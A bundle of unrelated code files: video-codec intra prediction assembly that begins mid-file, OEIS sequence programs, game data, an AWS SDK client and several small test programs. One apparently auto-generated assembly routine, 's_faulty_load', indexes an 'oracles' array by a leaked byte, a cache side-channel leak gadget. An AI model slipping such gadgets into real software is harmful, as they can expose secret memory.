PALIGNR m5, m1, 2, m0
pslldq m4, m6, 2
PRED4x4_LOWPASS m6, m4, m2, m6
PRED4x4_LOWPASS m1, m3, m5, m1
mova [r2+r3*4], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r2+r1*1], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r2+r3*2], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r2+r3*1], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r0+r3*4], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r0+r1*1], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r0+r3*2], m1
PALIGNR m1, m6, 14, m6
mova [r0+r3*1], m1
RET
.fix_tr:
punpckhwd m3, m3
pshufd m1, m3, 0xFF
jmp .do_topright
%endmacro
INIT_XMM sse2
PRED8x8L_DOWN_LEFT
INIT_XMM ssse3
PRED8x8L_DOWN_LEFT
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_DOWN_LEFT
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_down_right(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_DOWN_RIGHT 0
; standard forbids this when has_topleft is false
; no need to check
cglobal pred8x8l_down_right_10, 4, 5, 8
sub r0, r3
lea r4, [r0+r3*4]
lea r1, [r3*3]
mova m0, [r0+r3*1-16]
punpckhwd m0, [r0+r3*0-16]
mova m1, [r0+r1*1-16]
punpckhwd m1, [r0+r3*2-16]
punpckhdq m1, m0
mova m2, [r4+r3*1-16]
punpckhwd m2, [r4+r3*0-16]
mova m3, [r4+r1*1-16]
punpckhwd m3, [r4+r3*2-16]
punpckhdq m3, m2
punpckhqdq m3, m1
mova m0, [r4+r3*4-16]
mova m1, [r0]
PALIGNR m4, m3, m0, 14, m0
PALIGNR m1, m3, 2, m2
pslldq m0, m4, 2
pshuflw m0, m0, 11100101b
PRED4x4_LOWPASS m6, m1, m4, m3
PRED4x4_LOWPASS m4, m3, m0, m4
mova m3, [r0]
shr r2d, 13
pslldq m1, m3, 2
psrldq m2, m3, 2
pinsrw m1, [r0-2], 0
pinsrw m2, [r0+r2+14], 7
PRED4x4_LOWPASS m3, m2, m1, m3
PALIGNR m2, m3, m6, 2, m0
PALIGNR m5, m3, m6, 14, m0
psrldq m7, m3, 2
PRED4x4_LOWPASS m6, m4, m2, m6
PRED4x4_LOWPASS m3, m5, m7, m3
mova [r4+r3*4], m6
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r0+r3*1], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r0+r3*2], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r0+r1*1], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r0+r3*4], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r4+r3*1], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r4+r3*2], m3
PALIGNR m3, m6, 14, m6
mova [r4+r1*1], m3
RET
%endmacro
INIT_XMM sse2
PRED8x8L_DOWN_RIGHT
INIT_XMM ssse3
PRED8x8L_DOWN_RIGHT
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_DOWN_RIGHT
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_vertical_right(pixel *src, int has_topleft,
; int has_topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_VERTICAL_RIGHT 0
; likewise with 8x8l_down_right
cglobal pred8x8l_vertical_right_10, 4, 5, 7
sub r0, r3
lea r4, [r0+r3*4]
lea r1, [r3*3]
mova m0, [r0+r3*1-16]
punpckhwd m0, [r0+r3*0-16]
mova m1, [r0+r1*1-16]
punpckhwd m1, [r0+r3*2-16]
punpckhdq m1, m0
mova m2, [r4+r3*1-16]
punpckhwd m2, [r4+r3*0-16]
mova m3, [r4+r1*1-16]
punpckhwd m3, [r4+r3*2-16]
punpckhdq m3, m2
punpckhqdq m3, m1
mova m0, [r4+r3*4-16]
mova m1, [r0]
PALIGNR m4, m3, m0, 14, m0
PALIGNR m1, m3, 2, m2
PRED4x4_LOWPASS m3, m1, m4, m3
mova m2, [r0]
shr r2d, 13
pslldq m1, m2, 2
psrldq m5, m2, 2
pinsrw m1, [r0-2], 0
pinsrw m5, [r0+r2+14], 7
PRED4x4_LOWPASS m2, m5, m1, m2
PALIGNR m6, m2, m3, 12, m1
PALIGNR m5, m2, m3, 14, m0
PRED4x4_LOWPASS m0, m6, m2, m5
pavgw m2, m5
mova [r0+r3*2], m0
mova [r0+r3*1], m2
pslldq m6, m3, 4
pslldq m1, m3, 2
PRED4x4_LOWPASS m1, m3, m6, m1
PALIGNR m2, m1, 14, m4
mova [r0+r1*1], m2
pslldq m1, 2
PALIGNR m0, m1, 14, m3
mova [r0+r3*4], m0
pslldq m1, 2
PALIGNR m2, m1, 14, m4
mova [r4+r3*1], m2
pslldq m1, 2
PALIGNR m0, m1, 14, m3
mova [r4+r3*2], m0
pslldq m1, 2
PALIGNR m2, m1, 14, m4
mova [r4+r1*1], m2
pslldq m1, 2
PALIGNR m0, m1, 14, m1
mova [r4+r3*4], m0
RET
%endmacro
INIT_XMM sse2
PRED8x8L_VERTICAL_RIGHT
INIT_XMM ssse3
PRED8x8L_VERTICAL_RIGHT
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_VERTICAL_RIGHT
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_horizontal_up(pixel *src, int has_topleft,
; int has_topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_HORIZONTAL_UP 0
cglobal pred8x8l_horizontal_up_10, 4, 4, 6
mova m0, [r0+r3*0-16]
punpckhwd m0, [r0+r3*1-16]
shr r1d, 14
dec r1
and r1, r3
sub r1, r3
mova m4, [r0+r1*1-16]
lea r1, [r3*3]
lea r2, [r0+r3*4]
mova m1, [r0+r3*2-16]
punpckhwd m1, [r0+r1*1-16]
punpckhdq m0, m1
mova m2, [r2+r3*0-16]
punpckhwd m2, [r2+r3*1-16]
mova m3, [r2+r3*2-16]
punpckhwd m3, [r2+r1*1-16]
punpckhdq m2, m3
punpckhqdq m0, m2
PALIGNR m1, m0, m4, 14, m4
psrldq m2, m0, 2
pshufhw m2, m2, 10100100b
PRED4x4_LOWPASS m0, m1, m2, m0
psrldq m1, m0, 2
psrldq m2, m0, 4
pshufhw m1, m1, 10100100b
pshufhw m2, m2, 01010100b
pavgw m4, m0, m1
PRED4x4_LOWPASS m1, m2, m0, m1
punpckhwd m5, m4, m1
punpcklwd m4, m1
mova [r2+r3*0], m5
mova [r0+r3*0], m4
pshufd m0, m5, 11111001b
pshufd m1, m5, 11111110b
pshufd m2, m5, 11111111b
mova [r2+r3*1], m0
mova [r2+r3*2], m1
mova [r2+r1*1], m2
PALIGNR m2, m5, m4, 4, m0
PALIGNR m3, m5, m4, 8, m1
PALIGNR m5, m5, m4, 12, m4
mova [r0+r3*1], m2
mova [r0+r3*2], m3
mova [r0+r1*1], m5
RET
%endmacro
INIT_XMM sse2
PRED8x8L_HORIZONTAL_UP
INIT_XMM ssse3
PRED8x8L_HORIZONTAL_UP
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_HORIZONTAL_UP
%endif
;-----------------------------------------------------------------------------
; void ff_pred16x16_vertical(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro MOV16 3-5
mova [%1+ 0], %2
mova [%1+mmsize], %3
%if mmsize==8
mova [%1+ 16], %4
mova [%1+ 24], %5
%endif
%endmacro
%macro PRED16x16_VERTICAL 0
cglobal pred16x16_vertical_10, 2, 3
sub r0, r1
mov r2d, 8
mova m0, [r0+ 0]
mova m1, [r0+mmsize]
%if mmsize==8
mova m2, [r0+16]
mova m3, [r0+24]
%endif
.loop:
MOV16 r0+r1*1, m0, m1, m2, m3
MOV16 r0+r1*2, m0, m1, m2, m3
lea r0, [r0+r1*2]
dec r2d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_VERTICAL
INIT_XMM sse2
PRED16x16_VERTICAL
;-----------------------------------------------------------------------------
; void ff_pred16x16_horizontal(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_HORIZONTAL 0
cglobal pred16x16_horizontal_10, 2, 3
mov r2d, 8
.vloop:
movd m0, [r0+r1*0-4]
movd m1, [r0+r1*1-4]
SPLATW m0, m0, 1
SPLATW m1, m1, 1
MOV16 r0+r1*0, m0, m0, m0, m0
MOV16 r0+r1*1, m1, m1, m1, m1
lea r0, [r0+r1*2]
dec r2d
jg .vloop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_HORIZONTAL
INIT_XMM sse2
PRED16x16_HORIZONTAL
;-----------------------------------------------------------------------------
; void ff_pred16x16_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_DC 0
cglobal pred16x16_dc_10, 2, 6
mov r5, r0
sub r0, r1
mova m0, [r0+0]
paddw m0, [r0+mmsize]
%if mmsize==8
paddw m0, [r0+16]
paddw m0, [r0+24]
%endif
HADDW m0, m2
lea r0, [r0+r1-2]
movzx r3d, word [r0]
movzx r4d, word [r0+r1]
%rep 7
lea r0, [r0+r1*2]
movzx r2d, word [r0]
add r3d, r2d
movzx r2d, word [r0+r1]
add r4d, r2d
%endrep
lea r3d, [r3+r4+16]
movd m1, r3d
paddw m0, m1
psrlw m0, 5
SPLATW m0, m0
mov r3d, 8
.loop:
MOV16 r5+r1*0, m0, m0, m0, m0
MOV16 r5+r1*1, m0, m0, m0, m0
lea r5, [r5+r1*2]
dec r3d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_DC
INIT_XMM sse2
PRED16x16_DC
;-----------------------------------------------------------------------------
; void ff_pred16x16_top_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_TOP_DC 0
cglobal pred16x16_top_dc_10, 2, 3
sub r0, r1
mova m0, [r0+0]
paddw m0, [r0+mmsize]
%if mmsize==8
paddw m0, [r0+16]
paddw m0, [r0+24]
%endif
HADDW m0, m2
SPLATW m0, m0
paddw m0, [pw_8]
psrlw m0, 4
mov r2d, 8
.loop:
MOV16 r0+r1*1, m0, m0, m0, m0
MOV16 r0+r1*2, m0, m0, m0, m0
lea r0, [r0+r1*2]
dec r2d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_TOP_DC
INIT_XMM sse2
PRED16x16_TOP_DC
;-----------------------------------------------------------------------------
; void ff_pred16x16_left_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_LEFT_DC 0
cglobal pred16x16_left_dc_10, 2, 6
mov r5, r0
sub r0, 2
movzx r3d, word [r0]
movzx r4d, word [r0+r1]
%rep 7
lea r0, [r0+r1*2]
movzx r2d, word [r0]
add r3d, r2d
movzx r2d, word [r0+r1]
add r4d, r2d
%endrep
lea r3d, [r3+r4+8]
shr r3d, 4
movd m0, r3d
SPLATW m0, m0
mov r3d, 8
.loop:
MOV16 r5+r1*0, m0, m0, m0, m0
MOV16 r5+r1*1, m0, m0, m0, m0
lea r5, [r5+r1*2]
dec r3d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_LEFT_DC
INIT_XMM sse2
PRED16x16_LEFT_DC
;-----------------------------------------------------------------------------
; void ff_pred16x16_128_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_128_DC 0
cglobal pred16x16_128_dc_10, 2,3
mova m0, [pw_512]
mov r2d, 8
.loop:
MOV16 r0+r1*0, m0, m0, m0, m0
MOV16 r0+r1*1, m0, m0, m0, m0
lea r0, [r0+r1*2]
dec r2d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_128_DC
INIT_XMM sse2
PRED16x16_128_DC
|
; A049086: Number of tilings of 4 X 3n rectangle by 1 X 3 rectangles. Rotations and reflections are considered distinct tilings.
; 1,3,13,57,249,1087,4745,20713,90417,394691,1722917,7520929,32830585,143313055,625594449,2730863665,11920848033,52037243619,227154537661,991581805481,4328482658041,18894822411423,82480245888473,360045244866137,1571680309076689,6860746056673507
mov $1,1
lpb $0,1
sub $0,1
add $2,$1
add $3,$1
add $1,$3
add $1,$3
add $3,$2
lpe
|
; A010869: Constant sequence: a(n) = 30.
; 30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30
mov $1,30
|
; A177071: (7n + 3)(7n + 4).
; 12,110,306,600,992,1482,2070,2756,3540,4422,5402,6480,7656,8930,10302,11772,13340,15006,16770,18632,20592,22650,24806,27060,29412,31862,34410,37056,39800,42642,45582,48620,51756,54990,58322,61752,65280,68906,72630,76452,80372,84390,88506,92720,97032,101442,105950,110556,115260,120062,124962,129960,135056,140250,145542,150932,156420,162006,167690,173472,179352,185330,191406,197580,203852,210222,216690,223256,229920,236682,243542,250500,257556,264710,271962,279312,286760,294306,301950,309692,317532,325470,333506,341640,349872,358202,366630,375156,383780,392502,401322,410240,419256,428370,437582,446892,456300,465806,475410,485112
sub $1,$0
bin $1,2
mul $1,98
add $1,12
mov $0,$1
|
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r15
push %r8
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x10217, %r8
nop
nop
nop
nop
cmp $10896, %rdx
movl $0x61626364, (%r8)
nop
cmp %rbp, %rbp
lea addresses_WC_ht+0x15f3, %r8
cmp %r15, %r15
mov $0x6162636465666768, %rax
movq %rax, %xmm1
vmovups %ymm1, (%r8)
nop
nop
cmp $39415, %rbp
lea addresses_UC_ht+0x1b477, %r12
nop
cmp $8342, %rsi
movb $0x61, (%r12)
nop
inc %r15
lea addresses_A_ht+0xbc57, %rsi
lea addresses_WT_ht+0x1cf17, %rdi
nop
sub %r12, %r12
mov $5, %rcx
rep movsq
nop
cmp %r8, %r8
lea addresses_A_ht+0x40d9, %rsi
lea addresses_D_ht+0x6017, %rdi
nop
nop
xor $21691, %r12
mov $27, %rcx
rep movsl
nop
sub %rbp, %rbp
lea addresses_A_ht+0xca17, %rdi
nop
nop
nop
nop
dec %rcx
movb $0x61, (%rdi)
nop
nop
nop
dec %r12
lea addresses_UC_ht+0x7884, %r15
nop
nop
nop
nop
nop
cmp $6577, %r12
mov (%r15), %r8d
nop
nop
xor %r15, %r15
lea addresses_D_ht+0xa317, %rdi
nop
nop
add $61768, %r8
mov $0x6162636465666768, %rdx
movq %rdx, %xmm5
and $0xffffffffffffffc0, %rdi
vmovntdq %ymm5, (%rdi)
add %rdi, %rdi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r8
pop %r15
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r8
push %rbx
push %rdi
push %rdx
// Faulty Load
lea addresses_US+0x1fa17, %rbx
nop
nop
nop
nop
nop
sub %r10, %r10
movups (%rbx), %xmm3
vpextrq $1, %xmm3, %r8
lea oracles, %r10
and $0xff, %r8
shlq $12, %r8
mov (%r10,%r8,1), %r8
pop %rdx
pop %rdi
pop %rbx
pop %r8
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 32, 'AVXalign': False}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 10, 'NT': False, 'type': 'addresses_A_ht', 'size': 4, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 2, 'NT': False, 'type': 'addresses_WC_ht', 'size': 32, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': True, 'congruent': 4, 'NT': False, 'type': 'addresses_UC_ht', 'size': 1, 'AVXalign': False}}
{'src': {'type': 'addresses_A_ht', 'congruent': 6, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}}
{'src': {'type': 'addresses_A_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 7, 'NT': False, 'type': 'addresses_A_ht', 'size': 1, 'AVXalign': False}}
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_UC_ht', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 8, 'NT': True, 'type': 'addresses_D_ht', 'size': 32, 'AVXalign': False}}
{'00': 92}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
db 0 ; species ID placeholder
db 40, 65, 95, 35, 60, 45
; hp atk def spd sat sdf
db POISON, POISON ; type
db 190 ; catch rate
db 114 ; base exp
db NO_ITEM, NO_ITEM ; items
db GENDER_F0 ; gender ratio
db 100 ; unknown 1
db 20 ; step cycles to hatch
db 5 ; unknown 2
INCBIN "gfx/pokemon/koffing/front.dimensions"
db 0, 0, 0, 0 ; padding
db GROWTH_MEDIUM_FAST ; growth rate
dn EGG_INDETERMINATE, EGG_INDETERMINATE ; egg groups
; tm/hm learnset
tmhm CURSE, ROLLOUT, TOXIC, ZAP_CANNON, HIDDEN_POWER, SUNNY_DAY, SNORE, PROTECT, ENDURE, FRUSTRATION, THUNDER, RETURN, DOUBLE_TEAM, SWAGGER, SLEEP_TALK, SLUDGE_BOMB, FIRE_BLAST, REST, ATTRACT, THIEF, FLAMETHROWER, THUNDERBOLT
; end
|
; void *heap_realloc(void *heap, void *p, size_t size)
INCLUDE "clib_cfg.asm"
SECTION code_alloc_malloc
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
IF __CLIB_OPT_MULTITHREAD & $01
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUBLIC _heap_realloc
EXTERN asm_heap_realloc
_heap_realloc:
pop af
pop de
pop hl
pop bc
push bc
push hl
push de
push af
jp asm_heap_realloc
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ELSE
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUBLIC _heap_realloc
EXTERN _heap_realloc_unlocked
defc _heap_realloc = _heap_realloc_unlocked
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ENDIF
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
#include <iostream>
#include <stdio.h>
using namespace std;
int main()
{
freopen("input.txt", "r", stdin);
int n;
cin>>n;
int *mas = new int[n];
for(int i = 0; i < n; ++i)
cin>>mas[i];
int c, t;
cin>>c;
for(int i = 0; i < c; ++i)
{
cin>>t;
--mas[t-1];
}
for(int i = 0; i < n; ++i)
{
if(mas[i]>=0) cout<<"no"<<endl;
else cout<<"yes"<<endl;
}
return 0;
} |
// Tests (non-)optimization of constant pointers to pointers
// The two examples of &screen is not detected as identical leading to ASM that could be optimized more
// Commodore 64 PRG executable file
.file [name="ptrptr-optimize-2.prg", type="prg", segments="Program"]
.segmentdef Program [segments="Basic, Code, Data"]
.segmentdef Basic [start=$0801]
.segmentdef Code [start=$80d]
.segmentdef Data [startAfter="Code"]
.segment Basic
:BasicUpstart(main)
.segment Code
main: {
.label screen = 2
// byte* screen = (char*)0x400
lda #<$400
sta.z screen
lda #>$400
sta.z screen+1
// sub('a',&screen)
lda #'a'
jsr sub
// sub('b',&screen)
lda #'b'
jsr sub
// }
rts
}
// void sub(__register(A) char ch, char **dst)
sub: {
// *(*dst)++ = ch
ldy.z main.screen
sty.z $fe
ldy.z main.screen+1
sty.z $ff
ldy #0
sta ($fe),y
// *(*dst)++ = ch;
inc.z main.screen
bne !+
inc.z main.screen+1
!:
// }
rts
}
|
BITS 32
;TEST_FILE_META_BEGIN
;TEST_TYPE=TEST_F
;TEST_IGNOREFLAGS=
;TEST_FILE_META_END
; SETL
mov ecx, 0x111
mov ebx, 0x010
cmp ecx, ebx
;TEST_BEGIN_RECORDING
setl al
;TEST_END_RECORDING
|
.data
msg1:.asciiz "Dwse to plithos: "
msg2:.asciiz "Dwse ton aritmhmo: "
.align 2
pin1: .space 100
.text
.globl main
main:
addi $v0,$0,4
la $a0,msg1
syscall
addi $v0,$0,5
syscall
add $t0,$v0,0
addi $v0,$0,4
la $a0,msg2
syscall
addi $v0,$0,5
syscall
add $s2,$v0,0
addi $s2,$s2,1
addi $t4,$0,0
loop1:
addi $v0,$0,5
syscall
add $t1,$0,$v0
sw $t1,pin1($t3)
addi $t3,$t3,4
addi $t4,$t4,1
blt $t4,$t0,loop1
la $a0,pin1
move $a1,$t0
move $a2,$s1
jal func
move $a0,$s1
li $v0,1
syscall
##exit##
li $v0,10
syscall
func:
addi $sp,$sp,-8
sw $ra,4($sp)
lw $t5,($a0)
addi $a1,$a1,-1
slt $t2,$t5,$s2
sw $t2,0($sp)
bne $a1,$0,L1
jr $ra
L1:
addi $a0,$a0,4
jal func
LL:
lw $t2,0($sp)
lw $ra,4($sp)
addi $sp,$sp,8
add $s1,$t2,$s1
jr $ra
|
/*
* Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
#include <aws/core/utils/Outcome.h>
#include <aws/core/auth/AWSAuthSigner.h>
#include <aws/core/client/CoreErrors.h>
#include <aws/core/client/RetryStrategy.h>
#include <aws/core/http/HttpClient.h>
#include <aws/core/http/HttpResponse.h>
#include <aws/core/http/HttpClientFactory.h>
#include <aws/core/auth/AWSCredentialsProviderChain.h>
#include <aws/core/utils/json/JsonSerializer.h>
#include <aws/core/utils/memory/stl/AWSStringStream.h>
#include <aws/core/utils/threading/Executor.h>
#include <aws/core/utils/DNS.h>
#include <aws/core/utils/logging/LogMacros.h>
#include <aws/connect/ConnectClient.h>
#include <aws/connect/ConnectEndpoint.h>
#include <aws/connect/ConnectErrorMarshaller.h>
#include <aws/connect/model/CreateUserRequest.h>
#include <aws/connect/model/DeleteUserRequest.h>
#include <aws/connect/model/DescribeUserRequest.h>
#include <aws/connect/model/DescribeUserHierarchyGroupRequest.h>
#include <aws/connect/model/DescribeUserHierarchyStructureRequest.h>
#include <aws/connect/model/GetContactAttributesRequest.h>
#include <aws/connect/model/GetCurrentMetricDataRequest.h>
#include <aws/connect/model/GetFederationTokenRequest.h>
#include <aws/connect/model/GetMetricDataRequest.h>
#include <aws/connect/model/ListContactFlowsRequest.h>
#include <aws/connect/model/ListHoursOfOperationsRequest.h>
#include <aws/connect/model/ListPhoneNumbersRequest.h>
#include <aws/connect/model/ListQueuesRequest.h>
#include <aws/connect/model/ListRoutingProfilesRequest.h>
#include <aws/connect/model/ListSecurityProfilesRequest.h>
#include <aws/connect/model/ListTagsForResourceRequest.h>
#include <aws/connect/model/ListUserHierarchyGroupsRequest.h>
#include <aws/connect/model/ListUsersRequest.h>
#include <aws/connect/model/StartChatContactRequest.h>
#include <aws/connect/model/StartOutboundVoiceContactRequest.h>
#include <aws/connect/model/StopContactRequest.h>
#include <aws/connect/model/TagResourceRequest.h>
#include <aws/connect/model/UntagResourceRequest.h>
#include <aws/connect/model/UpdateContactAttributesRequest.h>
#include <aws/connect/model/UpdateUserHierarchyRequest.h>
#include <aws/connect/model/UpdateUserIdentityInfoRequest.h>
#include <aws/connect/model/UpdateUserPhoneConfigRequest.h>
#include <aws/connect/model/UpdateUserRoutingProfileRequest.h>
#include <aws/connect/model/UpdateUserSecurityProfilesRequest.h>
using namespace Aws;
using namespace Aws::Auth;
using namespace Aws::Client;
using namespace Aws::Connect;
using namespace Aws::Connect::Model;
using namespace Aws::Http;
using namespace Aws::Utils::Json;
static const char* SERVICE_NAME = "connect";
static const char* ALLOCATION_TAG = "ConnectClient";
ConnectClient::ConnectClient(const Client::ClientConfiguration& clientConfiguration) :
BASECLASS(clientConfiguration,
Aws::MakeShared<AWSAuthV4Signer>(ALLOCATION_TAG, Aws::MakeShared<DefaultAWSCredentialsProviderChain>(ALLOCATION_TAG),
SERVICE_NAME, clientConfiguration.region),
Aws::MakeShared<ConnectErrorMarshaller>(ALLOCATION_TAG)),
m_executor(clientConfiguration.executor)
{
init(clientConfiguration);
}
ConnectClient::ConnectClient(const AWSCredentials& credentials, const Client::ClientConfiguration& clientConfiguration) :
BASECLASS(clientConfiguration,
Aws::MakeShared<AWSAuthV4Signer>(ALLOCATION_TAG, Aws::MakeShared<SimpleAWSCredentialsProvider>(ALLOCATION_TAG, credentials),
SERVICE_NAME, clientConfiguration.region),
Aws::MakeShared<ConnectErrorMarshaller>(ALLOCATION_TAG)),
m_executor(clientConfiguration.executor)
{
init(clientConfiguration);
}
ConnectClient::ConnectClient(const std::shared_ptr<AWSCredentialsProvider>& credentialsProvider,
const Client::ClientConfiguration& clientConfiguration) :
BASECLASS(clientConfiguration,
Aws::MakeShared<AWSAuthV4Signer>(ALLOCATION_TAG, credentialsProvider,
SERVICE_NAME, clientConfiguration.region),
Aws::MakeShared<ConnectErrorMarshaller>(ALLOCATION_TAG)),
m_executor(clientConfiguration.executor)
{
init(clientConfiguration);
}
ConnectClient::~ConnectClient()
{
}
void ConnectClient::init(const ClientConfiguration& config)
{
m_configScheme = SchemeMapper::ToString(config.scheme);
if (config.endpointOverride.empty())
{
m_uri = m_configScheme + "://" + ConnectEndpoint::ForRegion(config.region, config.useDualStack);
}
else
{
OverrideEndpoint(config.endpointOverride);
}
}
void ConnectClient::OverrideEndpoint(const Aws::String& endpoint)
{
if (endpoint.compare(0, 7, "http://") == 0 || endpoint.compare(0, 8, "https://") == 0)
{
m_uri = endpoint;
}
else
{
m_uri = m_configScheme + "://" + endpoint;
}
}
CreateUserOutcome ConnectClient::CreateUser(const CreateUserRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("CreateUser", "Required field: InstanceId, is not set");
return CreateUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_PUT, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return CreateUserOutcome(CreateUserResult(outcome.GetResult()));
}
else
{
return CreateUserOutcome(outcome.GetError());
}
}
CreateUserOutcomeCallable ConnectClient::CreateUserCallable(const CreateUserRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< CreateUserOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->CreateUser(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::CreateUserAsync(const CreateUserRequest& request, const CreateUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->CreateUserAsyncHelper( request, handler, context ); } );
}
void ConnectClient::CreateUserAsyncHelper(const CreateUserRequest& request, const CreateUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, CreateUser(request), context);
}
DeleteUserOutcome ConnectClient::DeleteUser(const DeleteUserRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DeleteUser", "Required field: InstanceId, is not set");
return DeleteUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DeleteUser", "Required field: UserId, is not set");
return DeleteUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_DELETE, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return DeleteUserOutcome(NoResult());
}
else
{
return DeleteUserOutcome(outcome.GetError());
}
}
DeleteUserOutcomeCallable ConnectClient::DeleteUserCallable(const DeleteUserRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< DeleteUserOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->DeleteUser(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
